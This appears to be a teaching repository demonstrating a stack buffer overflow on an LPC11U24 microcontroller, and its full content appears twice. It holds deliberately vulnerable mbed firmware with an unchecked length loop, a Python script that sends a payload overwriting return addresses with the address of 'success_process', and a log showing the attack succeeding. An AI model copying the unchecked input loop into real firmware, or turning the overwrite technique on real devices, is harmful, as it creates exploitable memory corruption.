jitomesky/bof_attacker.py

## bof_attacker.py
#!/usr/local/bin/python3
# -*- coding: utf-8 -*-


# please install pyserial
import serial

tty = "/dev/tty.usbserial-FTGD5T90"

com = serial.Serial(tty, 115200)

s = ""
while s.find("code:") < 0:
	c = com.read(1)
	s = s + bytes.decode(c)

print(s)

print("bof attack start!")

# 32byte payload
buf = [32, 0, 0, 0]
for i in range(int(32/4)-1):
	# 0x000003c5 : success_process
	# 0x000003c5 little endian
	buf.append(0xc5)
	buf.append(0x03)
	buf.append(0x00)
	buf.append(0x00)

# attack
com.write(bytearray(buf))


print("received message:\n")


while True:
	print(bytes.decode(com.read(1)), end="")

## log.txt
$ ./bof_attacker.py
memory map:
main: 0x000004b1
bof_vlun: 0x000003f5
bof_vlun_pad: 0x00000489
verification: 0x00000395
success_process: 0x000003c5
enter bof_vlun_pad
enter bof_vlun
code:
bof attack start!
received message:

enter bof_vlun
exit bof_vlun
verification error in bof_vuln
exit bof_vlun
enter success_process
verification success!
exit success_process
enter bof_vlun_pad
enter bof_vlun

## mbed_main.cpp
// LPC11U24 stack buffer overflow vulnerable demo
// using mbed library
// written by Toshifumi Nishinaga
// This code is public domain

#include "mbed.h"

DigitalOut myled(LED1);

Serial serial(P0_19,P0_18);

int verification(unsigned char *data)
{
	int ret=0;

	serial.printf("enter bof_vlun\n");

    if(data[1] == 0xfe)
        ret = 1;

    serial.printf("exit bof_vlun\n");
    return ret;
}

void success_process(void)
{
	serial.printf("enter success_process\n");

    serial.printf("verification success!\n");

    serial.printf("exit success_process\n");
}


void bof_vlun(void)
{
    unsigned char bin[10];

    serial.printf("enter bof_vlun\n");

    serial.printf("code:");

    // wait data
    while(!serial.readable());
    // get data length
    bin[0] = serial.getc();

    ////// vuln point : forget length check//////
    for(int i=1; i < bin[0]; i++) {
        // wait data
        while(!serial.readable());
        // input
        bin[i] = serial.getc();
    }
    ////// vuln point //////

    if(verification(bin)) {
        success_process();
    } else {
        serial.printf("verification error in bof_vuln\n");
    }

    serial.printf("exit bof_vlun\n");
}

void bof_vlun_pad(void)
{
    serial.printf("enter bof_vlun_pad\n");
    bof_vlun();
    serial.printf("exit bof_vlun_pad\n");
}


int main(void)
{
    serial.baud(115200);

    serial.printf("memory map:\n");
    serial.printf("main: 0x%08x\n", &main);
    serial.printf("bof_vlun: 0x%08x\n", &bof_vlun);
    serial.printf("bof_vlun_pad: 0x%08x\n", &bof_vlun_pad);
    serial.printf("verification: 0x%08x\n", &verification);
    serial.printf("success_process: 0x%08x\n", &success_process);


    while(1) {
        bof_vlun_pad();
    }

    return 0;
}
	#!/usr/local/bin/python3
	# -- coding: utf-8 --


	# please install pyserial
	import serial

	tty = "/dev/tty.usbserial-FTGD5T90"

	com = serial.Serial(tty, 115200)

	s = ""
	while s.find("code:") < 0:
	c = com.read(1)
	s = s + bytes.decode(c)

	print(s)

	print("bof attack start!")

	# 32byte payload
	buf = [32, 0, 0, 0]
	for i in range(int(32/4)-1):
	# 0x000003c5 : success_process
	# 0x000003c5 little endian
	buf.append(0xc5)
	buf.append(0x03)
	buf.append(0x00)
	buf.append(0x00)

	# attack
	com.write(bytearray(buf))


	print("received message:\n")


	while True:
	print(bytes.decode(com.read(1)), end="")
	$ ./bof_attacker.py
	memory map:
	main: 0x000004b1
	bof_vlun: 0x000003f5
	bof_vlun_pad: 0x00000489
	verification: 0x00000395
	success_process: 0x000003c5
	enter bof_vlun_pad
	enter bof_vlun
	code:
	bof attack start!
	received message:

	enter bof_vlun
	exit bof_vlun
	verification error in bof_vuln
	exit bof_vlun
	enter success_process
	verification success!
	exit success_process
	enter bof_vlun_pad
	enter bof_vlun
	// LPC11U24 stack buffer overflow vulnerable demo
	// using mbed library
	// written by Toshifumi Nishinaga
	// This code is public domain

	#include "mbed.h"

	DigitalOut myled(LED1);

	Serial serial(P0_19,P0_18);

	int verification(unsigned char *data)
	{
	int ret=0;

	serial.printf("enter bof_vlun\n");

	if(data[1] == 0xfe)
	ret = 1;

	serial.printf("exit bof_vlun\n");
	return ret;
	}

	void success_process(void)
	{
	serial.printf("enter success_process\n");

	serial.printf("verification success!\n");

	serial.printf("exit success_process\n");
	}


	void bof_vlun(void)
	{
	unsigned char bin[10];

	serial.printf("enter bof_vlun\n");

	serial.printf("code:");

	// wait data
	while(!serial.readable());
	// get data length
	bin[0] = serial.getc();

	////// vuln point : forget length check//////
	for(int i=1; i < bin[0]; i++) {
	// wait data
	while(!serial.readable());
	// input
	bin[i] = serial.getc();
	}
	////// vuln point //////

	if(verification(bin)) {
	success_process();
	} else {
	serial.printf("verification error in bof_vuln\n");
	}

	serial.printf("exit bof_vlun\n");
	}

	void bof_vlun_pad(void)
	{
	serial.printf("enter bof_vlun_pad\n");
	bof_vlun();
	serial.printf("exit bof_vlun_pad\n");
	}


	int main(void)
	{
	serial.baud(115200);

	serial.printf("memory map:\n");
	serial.printf("main: 0x%08x\n", &main);
	serial.printf("bof_vlun: 0x%08x\n", &bof_vlun);
	serial.printf("bof_vlun_pad: 0x%08x\n", &bof_vlun_pad);
	serial.printf("verification: 0x%08x\n", &verification);
	serial.printf("success_process: 0x%08x\n", &success_process);


	while(1) {
	bof_vlun_pad();
	}

	return 0;
	}